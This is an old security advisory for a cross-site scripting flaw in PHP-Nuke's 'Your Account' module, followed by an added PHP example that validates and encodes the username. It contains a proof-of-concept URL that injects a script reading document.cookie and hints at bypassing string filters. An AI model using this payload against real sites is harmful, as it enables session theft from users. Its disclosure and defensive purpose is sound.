PHPNuke Your Account XSS Vulnerability

14-5-2003

------------------------------------------------------
PHPNuke "Your Account" XSS Vulnerability
------------------------------------------------------

------------------------------------------------------
Vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 6.5 Final Release

------------------------------------------------------
Not tested but 90% vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5

------------------------------------------------------
About PHPNuke;
------------------------------------------------------
PHP-based content management system
http://www.phpnuke.org

------------------------------------------------------
Solution;
------------------------------------------------------
A simple string check or user check should be OK!

------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>

*You may need to log in first.

**Some servers/PHP-Nuke systems have a security check for "bla<script>" strings in query strings or POST variables (e.g. www.phpnuke.org), but these systems are still vulnerable. You can skip these controls with some JS tricks.
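
The "string check or user check" named under Solution, sketched as an added example (not PHP-Nuke code and not from the advisory's author). The function names, the username rule and the sample user list are assumptions made for illustration. It validates against an allowlist instead of searching for "<script>" strings, and encodes the value on output.

```php
<?php
// Added example: hypothetical handler for op=userinfo, not PHP-Nuke source.

/**
 * "String check": accept only names that match a strict allowlist.
 * Assumed rule: 1-25 characters of letters, digits, underscore, hyphen.
 * \A and \z anchor the whole string, so a trailing newline is rejected too.
 */
function is_valid_username(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,25}\z/', $name) === 1;
}

/**
 * "User check": stand-in for a parameterized database lookup.
 * $knownUsers is a constructed list used only by this example.
 */
function user_exists(string $name, array $knownUsers): bool
{
    return in_array($name, $knownUsers, true);
}

function render_userinfo(string $rawUsername, array $knownUsers): string
{
    if (!is_valid_username($rawUsername) || !user_exists($rawUsername, $knownUsers)) {
        // Fixed message: the rejected value is never echoed back.
        return '<p>No such user.</p>';
    }
    // Encode on output even after validation, as defense in depth.
    $safe = htmlspecialchars($rawUsername, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Profile of ' . $safe . '</h2>';
}

// Constructed sample inputs; the second is the value from the advisory's URL.
$knownUsers = ['alice', 'bob_77'];
$samples = [
    'alice',
    'bla<script>alert(document.cookie)</script>',
    'nobody',
];

foreach ($samples as $s) {
    echo render_userinfo($s, $knownUsers), "\n";
}
```

Only the first sample produces a profile heading; the other two get the fixed "No such user." response, so no request-supplied markup reaches the page.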
